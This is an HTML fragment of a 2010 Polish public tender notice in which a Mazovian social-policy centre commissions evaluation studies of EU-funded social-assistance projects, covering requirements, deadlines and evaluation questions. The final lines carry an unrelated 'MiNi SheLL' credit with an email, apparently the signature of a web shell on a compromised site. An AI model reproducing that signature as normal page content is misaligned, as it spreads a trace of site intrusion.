<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mcps.mazovia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.mcps.mazovia.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.09.2010 godzina 10:00, miejsce: Mazowieckie Centrum Polityki Społecznej w Warszawie, ul. Nowogrodzka 62a, 02-002, Sekretariat, III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, realizowane przez Mazowieckie Centrum Polityki Społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiotem pierwszej części zamówienia jest przeprowadzenie ewaluacji projektów systemowych OPS i PCPR realizowanych w ramach Działania 7.1 Programu Operacyjnego Kapitał Ludzki, w oparciu założenia do ewaluacji projektów systemowych Ośrodków Pomocy Społecznej i Powiatowych Centrów Pomocy Rodzinie z terenu województwa mazowieckiego, realizowanych przed 2010 rokiem w ramach Działania 7.1 Programu Operacyjnego Kapitał Ludzki Ministerstwa Rozwoju Regionalnego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Cel ewaluacji projektów systemowych

1.	Głównym celem ewaluacji projektów systemowych, realizowanych 
w Poddziałaniu 7.1.1 oraz 7.1.2 PO KL jest ocena jakości wsparcia przewidzianego w tych projektach systemowych oraz pozyskanie kompleksowej wiedzy na temat sposobu zarządzania i wdrażania przedmiotowych projektów. Wynikiem przeprowadzonej ewaluacji powinny być trafne i użyteczne rekomendacje, służące poprawie jakości przygotowywanych projektów systemowych oraz bardziej skutecznemu i efektywnemu ich wdrażaniu w kolejnych latach programowania. 

2.	Cele szczegółowe ewaluacji to: 

1)	ocena jakości wykorzystanych w projektach systemowych narzędzi, instrumentów oraz zastosowanych form pomocy społecznej pod kątem ich trafności, skuteczności i efektywności, w efekcie której zaproponowane zostaną rozwiązania o charakterze systemowym, które będzie można powszechnie uznać jako rozwiązania modelowe i stosować w przyszłości;
2)	ocena potencjału beneficjentów oraz jakości zarządzania w projektach systemowych, w tym zasobów beneficjentów systemowych, służących skutecznej i efektywnej realizacji projektów oraz stopnia przygotowania do realizacji projektów systemowych;
3)	identyfikacja barier i problemów: 
	związanych z wdrażaniem projektów systemowych, realizowanych w ramach Poddziałania 7.1.1 oraz Poddziałania 7.1.2 PO KL;
	powodujących nieprzystępowanie niektórych OPS/PCPR do realizacji projektów systemowych; 
	powodujących, że niektóre OPS/PCPR zrezygnowały z realizacji projektów systemowych; 
4)	identyfikacja potrzeb beneficjentów systemowych Poddziałania 7.1.1 oraz Poddziałania 7.1.2 PO KL, związanych z realizacją projektów systemowych;
5)	ocena stopnia efektywności i jakości współpracy beneficjentów systemowych 
z instytucjami zaangażowanymi w realizację PO KL, innymi instytucjami lokalnymi oraz partnerami (w przypadku realizacji projektów w partnerstwie).  


II.   Kryteria ewaluacyjne
 
Kryteria ewaluacyjne, które powinny zostać zastosowane w ramach badania to:

1.	Trafność - rozumiana jako ocena sposobu doboru zastosowanych w projektach systemowych narzędzi, instrumentów oraz form pomocy społecznej pod kątem realizacji  celów interwencji EFS w ramach PO KL (celów projektów systemowych, celu Działania 7.1, celu szczegółowego nr 1 Priorytetu VII, celu szczegółowego nr 2 PO KL), a także zapisów lokalnych strategii rozwiązywania problemów społecznych 
2.	Skuteczność - rozumiana jako stopień, w jakim wdrażane w projektach działania poprzez wykorzystane narzędzia, instrumenty oraz formy pomocy społecznej przyczyniają się do realizacji celów projektów systemowych OPS/PCPR oraz Działania 7.1, celu szczegółowego nr 1 Priorytetu VII, celu szczegółowego nr 2 PO KL 
3.	Efektywność - rozumiana jako stosunek uzyskanych efektów (osiągniętych celów, rezultatów projektów systemowych) do poniesionych nakładów finansowych, rzeczowych, kadrowych, czasowych, a także fakt dysponowania przez beneficjentów systemowych odpowiednimi zasobami niezbędnymi do sprawnej realizacji projektów
4.	Spójność - rozumiana jako stopień komplementarności (uzupełniania się) oraz kompleksowości (wszechstronności) narzędzi, instrumentów oraz form pomocy społecznej zastosowanych w projektach systemowych z Poddziałania 7.1.1 oraz 7.1.2 PO KL
III.   Pytania ewaluacyjne

Raport z badania musi przedstawiać odpowiedzi na następujące pytania:

1.	W jakim stopniu stosowane w projektach narzędzia, instrumenty i formy pomocy społecznej są właściwie dobrane i przyczyniają się do realizacji celów projektów systemowych oraz celu całego Działania 7.1 PO KL? Czy projekty są zgodne z lokalnymi strategiami rozwiązywania problemów społecznych (zgodnie z art. 17 ust. 1 pkt 1 oraz art. 19 pkt 1 ustawy z dnia 12 marca 2004 r. o pomocy społecznej)? 
2.	Które narzędzia, instrumenty i formy pomocy społecznej, zastosowane w projektach systemowych są najbardziej skuteczne (najlepiej przyczyniają się do realizacji celów i osiągnięcia rezultatów projektów systemowych OPS/PCPR oraz celu całego Działania 7.1 PO KL, jak również celu szczegółowego nr 1 Priorytetu VII PO KL oraz celu szczegółowego nr 2 PO KL)? 
3.	W jakim stopniu narzędzia i instrumenty, stosowane w ramach projektów systemowych są zróżnicowane, komplementarne względem siebie (uzupełniają się) oraz kompleksowe (działają wszechstronnie i wyczerpująco)? 
4.	Czy projekty systemowe w Poddziałaniu 7.1.1 oraz Poddziałaniu 7.1.2 PO KL są skutecznie zarządzane (czy budżet jest wydatkowany w założonym wymiarze, a zadania realizowane zgodnie z harmonogramem, określonym we wniosku o dofinansowanie projektu?; czy wartości docelowe wskaźników w ramach Działania 7.1, określone dla województwa w danym roku obowiązywania Planu Działania są przez beneficjentów systemowych osiągane?; czy przepływ informacji pomiędzy beneficjentami a uczestnikami jest 
wystarczający do skutecznej i sprawnej realizacji projektu?) 
5.	W jakim stopniu stosowane w projektach narzędzia, instrumenty i formy pomocy społecznej są efektywne (czy osiągnięte w projektach rezultaty można było zrealizować przy użyciu innych zasobów lub w krótszym okresie czasu)? 
6.	W jakim stopniu beneficjenci systemowi Poddziałania 7.1.1 oraz Poddziałania 7.1.2 PO KL są przygotowani do realizacji projektów systemowych (dysponują odpowiednim potencjałem finansowym, rzeczowym, kadrowym oraz czasowym, niezbędnym do sprawnej i efektywnej realizacji działań, określonych we wnioskach o dofinansowanie projektów systemowych)? 
7.	Czy w ramach rezerwy alokacji przeznaczonej na Działanie 7.1 PO KL w danym regionie  przewidziano środki na zatrudnienie w projektach systemowych OPS i PCPR dodatkowych pracowników socjalnych lub doradców ds. osób niepełnosprawnych? Jeśli tak, to w jakim stopniu zatrudnienie tych pracowników zwiększyło poziom skuteczności i efektywności realizowanych projektów? Jeżeli nie zatrudniono takich pracowników, to jakie były tego powody? 
8.	Dlaczego niektóre OPS/PCPR nie przystąpiły do projektów lub zrezygnowały z ich realizacji w kolejnym roku trwania projektu? Jakie są przyczyny podejmowania takich decyzji? 
9.	Jakich problemów doświadczają beneficjenci systemowi Poddziałania 7.1.1 oraz Poddziałania 7.1.2 w trakcie i w związku z realizacją projektów systemowych? Jakie działania podejmują w celu rozwiązania pojawiających się w trakcie realizacji projektu problemów? Z kim się kontaktują? Jakie metody i sposoby wykorzystują w celu rozwiązania tych problemów? Gdzie poszukują informacji na ten temat? Czy i od kogo uzyskują ewentualną pomoc w tym zakresie? 
10.	Jakie są potrzeby i oczekiwania beneficjentów systemowych Poddziałania 7.1.1 oraz Poddziałania 7.1.2 PO KL, związane ze wsparciem ze strony ROPS, realizowanym w ramach projektów systemowych z Poddziałania 7.1.3 PO KL ? 
11.	Jak beneficjenci systemowi Poddziałania 7.1.1 oraz Poddziałania 7.1.2 PO KL oceniają współpracę z innymi instytucjami lokalnymi (w tym przede wszystkim z publicznymi służbami zatrudnienia), organizacjami pozarządowymi, a także IP PO KL? 
12.	W jakim stopniu współpraca beneficjentów systemowych z partnerami jest skuteczna i efektywna? Jak beneficjenci systemowi oceniają jakość komunikacji pomiędzy liderem projektu a partnerami? Czy występują jakiekolwiek problemy we współpracy partnerskiej, a jeśli tak - to jakie? 
IV.   Minimum metodologiczne

d)	Analiza danych zastanych (desk research) - analizie poddane zostaną:
a.	wybrane przez MCPS (lub wykonawcę) wnioski o dofinansowanie projektów systemowych z Poddziałania 7.1.1 oraz Poddziałania 7.1.2 z 2009 r. dobór wniosków do analizy - losowy, wg następującego schematu:
i.	jeżeli liczba wniosków w regionie >150 to analiza powinna obejmować co najmniej 50% projektów systemowych, 
ii.	jeżeli liczba wniosków w regionie mieści się w przedziale 100-150, to analiza powinna obejmować co najmniej 60% zrealizowanych projektów systemowych,
iii.	jeżeli liczba wniosków w regionie <100, to analiza powinna obejmować co najmniej 70% projektów systemowych; 
b.	zapisy dokumentów programowych PO KL: 
i.	Programu Operacyjnego Kapitał Ludzki, 
ii.	Szczegółowego Opisu Priorytetów PO KL, 
iii.	Zasad przygotowania, realizacji oraz rozliczania projektów systemowych OPS, PCPR oraz ROPS
c.	lokalne (gminne/powiatowe) strategie rozwiązywania problemów społecznych (jeśli istnieją) w jednostkach samorządu terytorialnego, 
w których były realizowane projekty systemowe z Poddziałania 7.1.1 oraz Poddziałania 7.1.2 PO KL - liczba strategii dobrana analogicznie jak liczba wniosków o dofinansowanie;
d.	wyniki badań ewaluacyjnych IP/IP2 PO KL, dotyczących oceny wsparcia w zakresie integracji społecznej udzielanego ze środków finansowych PO KL (jeśli takie badania były w danym regionie przeprowadzone);
e)	Wywiady pogłębione (IDI) - prowadzone z koordynatorami projektów systemowych z Podziałania 7.1.1 i Poddziałania 7.1.2 PO KL - dobór respondentów do wywiadów w OPS/PCPR - losowy (co najmniej 5 wywiadów w każdym regionie); dyspozycje do wywiadu zawarte zostały w Załączniku 2.
f)	Ankieta internetowa (CAWI), skierowana do kierowników wszystkich OPS/PCPR w danym regionie - realizowana w 2010 r.; wzór ankiety do wykorzystania zawarty jest w Załączniku 1. 
g)	Studia przypadków (case studies) - dobrane celowo w każdym regionie; studia przypadków powinny polegać na szczegółowej analizie wniosku o dofinansowanie, dokumentacji projektowej oraz wizyt, uwzględniających obserwację w miejscu realizacji projektu; szczególnie istotna jest w tym przypadku możliwość wskazania i opisania tzw. dobrych praktyk, czyli przykładów inicjatyw i rozwiązań, które mogą być wskazane jako skuteczne formy przeciwdziałania wykluczeniu społecznemu. 
V. Obowiązki  Wykonawcy

1.	od Wykonawcy oczekuje się:
a)	współpracy z MCPS, polegającej na przygotowaniu narzędzi badawczych (wywiadu CAWI na podstawie zamieszczonego w założeniach wzoru kwestionariusza oraz szczegółowych pytań do wywiadów IDI na postawie dyspozycji z Załącznika 2.) oraz materiałów do badania;
b)	pozostawania w stałym kontakcie z MCPS (spotkania odpowiednio do potrzeb, kontakt telefoniczny, e-mail, wyznaczenie osoby do kontaktów roboczych);
c)	informowania o stanie prac, pojawiających się problemach i innych zagadnieniach istotnych dla realizacji badania; 
d)	przekazania MCPS wstępnej wersji raportu końcowego oraz ostatecznej wersji raportu końcowego, narzędzi badawczych oraz wszystkich baz danych.
2.	Obowiązkiem Wykonawcy jest zapewnienie respondentom pełnej anonimowości w celu uzyskania jak najbardziej wiarygodnych danych.
3.	Wszystkie materiały przygotowane w trakcie badania (m.in. kwestionariusze, raporty) powinny być opatrzone godłem UE oraz logo Programu Operacyjnego Kapitał Ludzki oraz informacją o współfinansowaniu badania ze środków UE, w formie zapisu: Badanie ewaluacyjne współfinansowane przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Użyte emblematy i sformułowania muszą być zgodne z zasadami wizualizacji PO KL.






VI. Struktura raportu końcowego

Raport końcowy nie powinien zawierać więcej niż 50 stron A4 (bez załączników) 
i powinien składać się z następujących elementów: 
	maksymalnie 2 strony A4 w formie podsumowania, w którym zebrane zostaną najistotniejsze wyniki i rekomendacje; 
	streszczenie w języku polskim (istotne wyniki wraz z rekomendacjami; objętość do 5 stron A4); streszczenie powinno być zawarte  w osobnym dokumencie;
	spis treści;
	wprowadzenie (opisu przedmiotu badania, celów badania);
	opis wyników badania (wraz z ich analizą i interpretacją);
	wnioski (podsumowanie badania z uwzględnieniem specyfiki badanego obszaru) i ponumerowane rekomendacje w formie tabelarycznej, zredagowane wg wzoru z Załącznika 3;
	aneksy, przedstawiające zestawienia danych oraz zastosowane narzędzia badawcze..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.31.50.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Zgodność użytych przy realizacji zamówienia metod / technik badawczych z Założeniami do ewaluacji projektów systemowych OPS i PCPR, realizowanych w ra - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem zamówienia jest przeprowadzenie Projektu systemowego POKL realizowanego w ramach Działania 7.1.3  przez MCPS ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia;

Głównym celem ewaluacji  jest ocena  jakości  działań realizowanych przez MCPS 
w projekcie oraz pozyskanie wiedzy na temat czynników mających wpływ na sposób udzielanego wsparcia  jednostkom pomocy społecznej realizującym działania aktywnej integracji.

Cele szczegółowe ewaluacji;

1.	Ocena jakości przeprowadzanych szkoleń pod względem doboru tematyki szkoleń, seminariów, konferencji , wizyt studyjnych w efekcie której będzie można  dokonać zmiany co do doboru tematyki szkoleń i pozostałych działań aby  osiągnąć jak najwyższą  jakość i przydatność szkoleń organizowanych
 w kolejnych latach.

2.	Ocena jakość  prowadzonych szkoleń  w odniesieniu do wykładowców informacje z tej części ewaluacji pozwolą na dobór najlepszych wykładowców w poszczególnej tematyce na kolejne lata, oraz na analizę ponoszonych kosztów w stosunku do jakości świadczonej usługi.

3.	Ocena jakości bazy szkoleniowej tj. miejsca doboru szkolenia, jakości zakwaterowania, w trakcie;  szkoleń, seminariów, konferencji , co pozwoli na określenie stopnia przydatności wybranej bazy  do potrzeb odbiorców w celu zapewnienia optymalnych warunków dla realizacji działań oraz analizę ponoszonych kosztów w stosunku do osiąganej jakości usług.

4.	Ocenę stopnia aktywności pracowników poszczególnych podmiotów jednostek pomocy  społecznej i organizacji realizujących aktywną integrację   uczestniczących  w szkoleniach seminariach i konferencjach. Dane uzyskane w wyniku badania pozwolą na przeprowadzenie analizy porównawczej pozwalającej na określenie efektywności prowadzonych działań szkoleniowych przez MCPS w zakresie realizacji projektów systemowych prowadzonych na terenie Mazowsza.


Kryteria ewaluacyjne

Trafność - rozumiana jako jakość doboru tematyki szkoleń, konferencji, seminariów do potrzeb uczestników.
Skuteczność - rozumiana jako stopień jakości  kadry wykładowców  oraz  jakości miejsca odbywania szkoleń  w stosunku do oceny ich ogólnej przydatności dla uczestników.
Efektywność - rozumiana jako stosunek liczby uczestników projektu do zakładanych rezultatów projektu.
Spójność - rozumiana jako stopień wykorzystania możliwości uczestnictwa w szkoleniach, seminariach, konferencjach na realizację przez poszczególne instytucje pomocy społecznej projektów systemowych. 

Pytania ewaluacyjne;

Raport musi przedstawić odpowiedzi na następujące pytania.
1.	Przedstawiciele, których instytucji i organizacji są najaktywniejszymi uczestnikami oferowanych działań?
2.	Które tematy szkoleń seminariów i konferencji są najbardziej cenione i w jaki stopniu?
3.	Którzy z  wykładowców  są najbardziej cenieni  przez odbiorców szkoleń, seminariów i konferencji.
4.	W jakich miejscach i w jakich warunkach powinny być organizowane najefektywniejsze szkolenia.
5.	Jaki wpływ ma uczestnictwo w szkoleniach  poszczególnych pracowników na zaangażowane  instytucji pomocy społecznej w realizację projektów systemowych.
Analiza danych zastanych;

Analizie poddane zostaną: 
a)	Analiza ankiet ewaluacyjnych uczestników działań projektu  za 2009 rok i w okresie styczeń-wrzesień 2010.
b)	Analiza dokumentów  w formie papierowej i elektronicznej pozostająca w dyspozycji MCPS.
Obowiązki wykonawcy;
Od wykonawcy oczekuje się;
a)	współpracy z Zamawiającym, polegającej na przygotowaniu narzędzi badawczych oraz materiałów do badania;
b)	pozostawania w stałym kontakcie z Zamawiającym (spotkania odpowiednio do potrzeb, kontakt telefoniczny, e-mail, wyznaczenie osoby do kontaktów roboczych);
c)	informowania o stanie prac, pojawiających się problemach i innych zagadnieniach istotnych dla realizacji badania;
d)	 przekazania Zamawiającemu wstępnej wersji raportu końcowego oraz ostatecznej wersji raportu końcowego (zgodnie z szczegółowym harmonogramem ustalonym przez MCPS), narzędzi badawczych oraz wszystkich baz danych.
Harmonogram realizacji zamówienia
a.	Przeprowadzenie badań ewaluacyjnych do 15.11.2010 r.
b.	Przeprowadzenie analizy danych z badań i sporządzenie wstępnej wersji raportu końcowego do dnia 30 .11.2010r.
c.	Przekazanie ostatecznej wersji raportu końcowego z badania ewaluacyjnego do 15.12.2010 r.
d.	Przekazanie skróconej wersji raportu przygotowanej do publikacji do 20.12.2010..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.31.50.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com